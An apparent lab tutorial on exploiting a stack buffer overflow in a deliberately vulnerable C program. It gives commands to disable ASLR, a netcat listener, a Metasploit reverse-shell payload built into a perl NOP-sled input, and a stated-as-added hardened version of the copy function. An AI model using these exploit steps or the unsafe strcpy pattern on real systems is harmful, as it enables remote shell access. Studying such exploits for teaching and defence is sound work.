Simple.BOF.Tutorial

This guide is thanks to the work done by Preddy - RootShell Security Group http://www.exploiter5.com/all.php?id=44

Program:

    // vuln-prog.c
    #include <stdlib.h>
    #include <stdio.h>
    #include <string.h>

    int bof(char *string) {
        char buffer[1024];
        strcpy(buffer, string);   // unbounded copy: no check against the 1024-byte buffer
        return 1;
    }

    int main(int argc, char *argv[]) {
        bof(argv[1]);
        printf("Done. .\n");
        return 1;
    }

Step 0: Open a new konsole and start up netcat with the following command:

    nc -l -p 9999 -vv

Step 1: Compile the program stated above with the following command:

    gcc vuln-prog.c -o vuln-prog

Step 2: Disable the kernel protection (address-space layout randomization) by typing the following command in the konsole/terminal:

    echo 0 > /proc/sys/kernel/randomize_va_space

Step 3: Start up gdb with the program loaded:

    gdb ./vuln-prog

Step 4: Run the application with an input greater than 1024 bytes in gdb:

    (gdb) run `perl -e 'print "A"x1032'`

Step 5: Look at the registers for EIP:

    (gdb) i r

Step 6: Start up the Metasploit Web Interface (msfweb) in BackTrack v3.

Step 7: Click on the PAYLOADS button and search for "Linux command shell, reverse". Find the reverse shell for the x86 architecture.

Step 8: Generate a new shell with the following options:

    LPORT: 9999
    LHOST: <your backtrack ip addr>

Step 9: Copy the generated code and strip off the quotes, newlines, and spaces.

Step 10: Note the size in bytes of the generated shellcode. Then 1032 - 600 - 4 - <size of shellcode> = number of NOPs you need.

Step 11: Run the following command to test if you are still generating an overflow:

    run `perl -e 'print "A"x600,"\x90"x<#nops>,"<shellcode>","BBBB"'`

Step 12: You should see that EIP failed at \x42\x42\x42\x42. You need to find a NOP location to start executing your code:

    (gdb) x/2000xb $esp

Step 13: Reverse the code address (little-endian byte order), i.e. AABBCCDD becomes \xDD\xCC\xBB\xAA, and replace the previous BBBB with the code location....
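As an added example that is not part of the tutorial, here is the tutorial's bof() beside a bounds-checked replacement (bof_safe and accepts_length are names chosen for this example, not from the page): the only change is that the input length is checked before any byte lands in buffer, so the 1032-byte argument that overwrote EIP in Step 4 is refused instead of copied.

```c
#include <stdbool.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* The tutorial's bof(): strcpy() copies until the source NUL, so any
   argument of 1024 bytes or more runs past buffer into the saved frame. */
int bof_unsafe(char *string)
{
    char buffer[1024];
    strcpy(buffer, string);
    return 1;
}

/* Hardened counterpart (name chosen for this example): measure first and
   refuse anything that would not fit together with its terminating NUL.
   Returns true when the input was copied, false when it was rejected. */
bool bof_safe(const char *string)
{
    char buffer[1024];
    size_t len = strlen(string);
    if (len >= sizeof buffer)           /* >= keeps room for the NUL */
        return false;
    memcpy(buffer, string, len + 1);    /* copy exactly what was checked */
    return true;
}

/* Build a string of n 'A's (the equivalent of perl -e 'print "A"x n') and
   feed it to bof_safe(), so the cut-off can be checked without a debugger. */
bool accepts_length(size_t n)
{
    char *s = malloc(n + 1);
    if (s == NULL) return false;
    memset(s, 'A', n);
    s[n] = '\0';
    bool ok = bof_safe(s);
    free(s);
    return ok;
}

int main(void)
{
    /* 1023 bytes is the largest input that fits; 1032 is what Step 4 used. */
    printf("1023 bytes accepted: %d\n", accepts_length(1023));
    printf("1032 bytes accepted: %d\n", accepts_length(1032));
    return 0;
}
```

Compiling with the stack protector left on and leaving randomize_va_space at its default are the other two layers; this check is the one that removes the bug itself.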